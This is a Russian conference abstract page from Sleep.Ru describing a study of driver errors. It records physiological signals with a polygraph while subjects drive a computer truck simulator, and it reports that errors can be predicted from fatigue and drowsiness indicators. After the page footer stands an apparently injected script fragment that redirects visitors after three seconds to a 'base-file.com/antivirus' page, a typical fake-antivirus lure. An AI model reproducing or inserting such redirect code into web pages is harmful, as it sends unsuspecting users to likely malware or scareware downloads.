Rambler's Top100    Sleep.Ru - На главную страницу
2-я Российская школа-конференция “Сон - окно в мир бодрствования”
 пред. | след. >> оглавление тезисов    ENGLISH



"ВИРТУАЛЬНАЯ РЕАЛЬНОСТЬ" И ПОЛИГРАФИЯ: КОМПЛЕКСНАЯ МЕТОДОЛОГИЯ ИССЛЕДОВАНИЯ НАРУШЕНИЙ ДЕЯТЕЛЬНОСТИ ЧЕЛОВЕКА

Дорохов В.Б.
Институт высшей нервной деятельности и нейрофизиологии РАН. Москва

VIRTUAL REALITY AND POLYGRAPHY : COMPLEX METHODOLOGY OF ERRONEOUS PERFORMANCE IN HUMAN

Dorokhov V.B.
Institute of Higher Nervous Activity and Neurophysiology RAS,Moscow, Russia

Технологии "виртуальной реальности" основаны на свойстве человеческой психики оперировать субъективными образами, что позволяет ощущать "эффект присутствия" при деятельности человека в виртуальном мире. Компьютерные автомобильные симуляторы дают возможность достигать эффектов погружения в виртуальный мир вождения автомобиля довольно простыми способами. При этом особую роль играет опыт вождения автомобиля, автоматизмы водителя и реалистичность игрового мира.

Исследование психофизиологических механизмов возникновения ошибок в деятельности требует анализа основных элементов функциональной системы организма, участвующих в исследуемой деятельности. Этому требованию удовлетворяют метод полиграфической регистрации, который в настоящее время может быть реализован компьютерными сомнологическими полиграфами, укомплектованными мультимедийными устройствами и миниатюрными специализированными сенсорами, предназначенными для длительной регистрации разнообразных физиологических показателей во время сна.

МЕТОДИКА.ИСПЫТУЕМЫЕ: Мужчины со стажем вождения не менее 1 года (n=15). Длительность эксперимента 3-10 часов.

АВТОМОБИЛЬНЫЙ СИМУЛЯТОР: Программа "Дальнобойщики-2" с возможностью регистрации поведения водителя путем сохранения видеофильма с запоминанием параметров движения автомобиля (скорость, переключение передач, обороты двигателя, наличие бензина). Компьютерный проектор. Руль (с тактильной обратной связью), коробка передач, педали.

ПОЛИГРАФИЯ: Сомнологический полиграф Sagura - 2000, Германия.

Физиологические показатели: ЭЭГ (3), ЭМГ (1), ЭКГ (1), ЭОГ (2), КГР (2), температура, пульсоксиметрия (SpO2, плетизмограмма, пульс), дыхание (1), движение руки (1), голос.

Поведенческие показатели: 1) Видеофильм поведения водителя, 2) Видеозапись движения автомобиля, 3) Звуковая запись диалога водителя и методиста, 4) Метки - при прохождении маршрута, которыми методист джостиком или компьютерными метками отмечает важные точки маршрута и появление значимых событий.

Субъективные показатели: Отчет, вопросы, ответы. При совершении ошибок, водитель голосом сообщает причину ошибки. Методист дает рекомендации по маршруту и уточняет причину ошибок. При проезде светофоров водитель сообщает цвет светофора.

ИНСТРУКЦИЯ: Движение по кольцевому маршруту длительностью 40 - 60 м, обязательное выполнение правил уличного движения: ограничения скорости, правила обгона, предписания светофора и т.д. Кроме инструкции получаемой от методиста, контроль движения в игровом мире осуществляет полиция. Нарушением деятельности считается несоблюдение правил дорожного движения. Качество вождения оценивалось по количеству пересечений осевой и боковой линий, скорости движения и т. д.

ПСИХОФИЗИОЛОГИЧЕСКОЕ ТЕСТИРОВАНИЕ: 1) до и после эксперимента, 2) во время эксперимента, при кратковременных остановках после каждого круга.

РЕЗУЛЬТАТЫ. Проведена предварительная классификации нарушений деятельности при моделировании вождения на автомобильном симуляторе. Полученные результаты показывают возможность предсказания появления нарушений деятельности по физиологическим и поведенческим показателям испытуемых и их зависимость от характера ошибок, вызываемых развитием стресса, утомления и дремотного состояния.

Работа выполнена при поддержке ЗАО "Нейроком"

 


 
2-я Российская школа-конференция по сну :    Тезисы | Abstract list (ENGLISH)    
     Наверх Sleep.Ru :     Оборудование  |  Конференции  |   Библиотека  |  Ссылки      
  © 2001 Sleep.Ru   Rambler's Top100     
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>